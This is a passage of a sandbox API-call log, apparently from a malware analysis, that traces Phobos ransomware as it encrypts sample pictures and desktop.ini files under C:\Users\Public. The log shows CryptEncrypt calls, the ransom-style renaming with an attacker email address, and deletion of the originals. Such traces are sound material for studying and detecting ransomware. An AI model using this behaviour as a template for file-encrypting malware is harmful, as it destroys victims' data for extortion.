"c:\\users\\public\\pictures\\desktop.ini")) returned 1 [0204.883] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0204.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0204.885] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=879394) returned 1 [0204.885] CloseHandle (hObject=0x13c) returned 1 [0204.885] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg")) returned 0x20 [0204.885] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0204.885] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0204.885] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0204.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0204.886] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0204.886] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0204.886] ReadFile (in: hFile=0x13c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd6b22, lpOverlapped=0x0) returned 1 [0205.082] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd6b30, dwBufLen=0xd6b30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd6b30) returned 1 [0205.089] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd6b30, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd6b30, lpOverlapped=0x0) returned 1 [0205.102] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328e8) returned 1 [0205.102] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0205.102] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0205.102] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.102] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0205.103] CryptDestroyKey (hKey=0xa32928) returned 1 [0205.103] CloseHandle (hObject=0x13c) returned 1 [0205.103] CloseHandle (hObject=0x100) returned 1 [0205.103] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg")) returned 1 [0205.111] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0205.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0205.112] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=845941) returned 1 [0205.112] CloseHandle (hObject=0x100) returned 1 [0205.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg")) returned 0x20 [0205.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0205.112] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0205.112] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0205.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.113] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0205.113] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0205.113] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xce875, lpOverlapped=0x0) returned 1 [0205.236] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xce880, dwBufLen=0xce880 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xce880) returned 1 [0205.243] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xce880, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xce880, lpOverlapped=0x0) returned 1 [0205.304] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0205.304] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0205.304] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0205.304] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.304] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0205.304] CryptDestroyKey (hKey=0xa32928) returned 1 [0205.304] CloseHandle (hObject=0x100) returned 1 [0205.304] CloseHandle (hObject=0x13c) returned 1 [0205.304] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg")) returned 1 [0205.311] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0205.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.417] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=775702) returned 1 [0205.418] CloseHandle (hObject=0x13c) returned 1 [0205.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg")) returned 0x20 [0205.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.418] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0205.418] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0205.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0205.419] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0205.419] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0205.419] ReadFile (in: hFile=0x13c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xbd616, lpOverlapped=0x0) returned 1 [0205.472] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbd620, dwBufLen=0xbd620 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbd620) returned 1 [0205.478] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xbd620, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xbd620, lpOverlapped=0x0) returned 1 [0205.492] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328e8) returned 1 [0205.492] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0205.492] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0205.492] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.492] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0205.492] CryptDestroyKey (hKey=0xa32928) returned 1 [0205.492] CloseHandle (hObject=0x13c) returned 1 [0205.492] CloseHandle (hObject=0x100) returned 1 [0205.492] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg")) returned 1 [0205.501] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0205.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0205.502] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=777835) returned 1 [0205.502] CloseHandle (hObject=0x100) returned 1 [0205.502] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg")) returned 0x20 [0205.502] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0205.502] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0205.502] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0205.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.503] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0205.503] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0205.503] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xbde6b, lpOverlapped=0x0) returned 1 [0205.577] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbde70, dwBufLen=0xbde70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbde70) returned 1 [0205.583] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xbde70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xbde70, lpOverlapped=0x0) returned 1 [0205.593] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0205.593] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0205.593] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0205.593] CryptDestroyKey (hKey=0xa32868) returned 1 [0205.593] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0205.594] CryptDestroyKey (hKey=0xa32928) returned 1 [0205.594] CloseHandle (hObject=0x100) returned 1 [0205.594] CloseHandle (hObject=0x13c) returned 1 [0205.594] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg")) returned 1 [0205.599] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0205.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.601] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=620888) returned 1 [0205.601] CloseHandle (hObject=0x13c) returned 1 [0205.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg")) returned 0x20 [0205.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0205.601] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0205.601] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0205.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0205.602] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0205.602] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0205.602] ReadFile (in: hFile=0x13c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x97958, lpOverlapped=0x0) returned 1 [0205.765] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x97960, dwBufLen=0x97960 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x97960) returned 1 [0205.769] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x97960, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x97960, lpOverlapped=0x0) returned 1 [0205.827] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0205.827] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0205.827] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0205.828] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.828] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0205.828] CryptDestroyKey (hKey=0xa32928) returned 1 [0205.828] CloseHandle (hObject=0x13c) returned 1 [0205.828] CloseHandle (hObject=0x100) returned 1 [0205.828] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg")) returned 1 [0205.833] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0205.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0205.937] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=171) returned 1 [0205.937] CloseHandle (hObject=0x100) returned 1 [0205.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini")) returned 0x26 [0205.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0205.938] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0205.938] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0205.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0206.219] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0206.219] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0206.219] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xab, lpOverlapped=0x0) returned 1 [0206.220] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0206.220] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0206.221] CryptImportKey (in: hProv=0xa24cf8, 